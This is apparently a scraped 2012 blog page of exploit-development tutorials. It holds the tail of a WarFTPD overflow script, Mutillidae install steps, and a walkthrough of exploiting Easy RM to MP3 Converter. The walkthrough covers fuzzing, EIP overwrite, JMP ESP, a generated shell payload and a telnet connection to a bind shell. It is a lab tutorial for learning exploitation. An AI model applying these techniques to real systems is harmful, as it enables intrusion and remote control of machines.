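    print("EIP offset:", pattern_offset(pat, 0x32714131))   # 485
    print("ESP offset:", pattern_offset(pat, "q4Aq5Aq"))     # 493
    payload = build_buffer(b"\xcc" * 4)   # int3 placeholder, not a real payload
    if "--send" in sys.argv:
        send_exploit(payload)
```

Swap the int3 placeholder for the opcode bytes msfweb generates (the bad-character check in ftp_user_command tells you if the generated payload needs re-encoding) and run with --send while WarFTPD sits under OllyDbg with the breakpoint on the JMP ESP address.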












Install Mutillidae on BackTrack 5



Now we will try to install Mutillidae.
If you have not downloaded it yet, download Mutillidae from the Internet
or from the link below:
http://sourceforge.net/projects/mutillidae/files/latest/download

Once it is downloaded, extract it into the root folder,

as below:


After it has been extracted, run the following in the Terminal:

Install apache2 first if it is not installed. After that, continue in the Terminal:


After that, install the MySQL server:


Saturday, October 6, 2012

STACK BUFFER OVERFLOW EASY RM TO MP3 CONVERTER

The background on buffer overflows, fuzzers and fuzzing, and the tools used (OllyDbg as the debugger, a fuzzer to do the fuzzing, and Python to write the fuzzer and the exploit), are the same as in the WarFTPD post above.


Before we start you need the application Easy RM to MP3 Converter,
like the following:



For Easy RM to MP3 Converter I am trying to write a simple fuzzer that can feed abnormal data to the converter (it reads input files rather than a network protocol). The fuzzer is written in Python.

as the example below:

Now run it and see whether Easy RM to MP3 Converter crashes;
when it crashes, the following appears:



Now start using OllyDbg, so that we know whether the crash overwrote EIP or not.

Open OllyDbg and Easy RM to MP3 Converter. In OllyDbg click File -> Attach, select RM2MP3Converter, click Attach and then run it. Then in RM2MP3 click Load, enter the file name and file type, and click Open. To make this clear, do as follows:



Now start working out how many bytes are needed, using pattern_create. Run the command as follows:
./pattern_create.rb 27000 > string_pattern.txt

Note that the pattern is only unique for 20280 bytes (26 x 26 x 10 three-byte groups); beyond that it repeats, so for a 27000-byte pattern pattern_offset.rb can report more than one offset for the same value.




The string pattern of 27000 characters is now visible; continue by placing the string in the fuzzer.




Run as before.

Now use pattern_offset.rb to calculate how many bytes from the start of the pattern the string found in the registers lies. In the console do as below:




Rebuild the script to change the EIP value to DEADBEEF, as follows:

Run as before; the results are as follows:


Then carry out the following steps:
click View -> Executable modules; it will then appear as follows:




If it looks like the above, proceed to determine which library you want to use: double-click on the file name and it will appear as follows.
Now right-click in the main window: Search for -> Command.


Type JMP ESP in the window and press Find.


Continue as follows:




Run it again as before, so that the result is as follows:

Then right-click and select Breakpoint -> Memory, on access.




Now continue by generating a payload; do as follows:

Open a web browser and go to the address http://127.0.0.1:5555.
In the payload configuration menu choose the shell payload type, as shown in the following:

The rows of opcode for the selected payload code are then visible, as follows:

Now just enter the payload code into the fuzzer application written previously.


Check the payload again using OllyDbg and Easy RM to MP3 Converter, then run # telnet 192.168.56.101 4444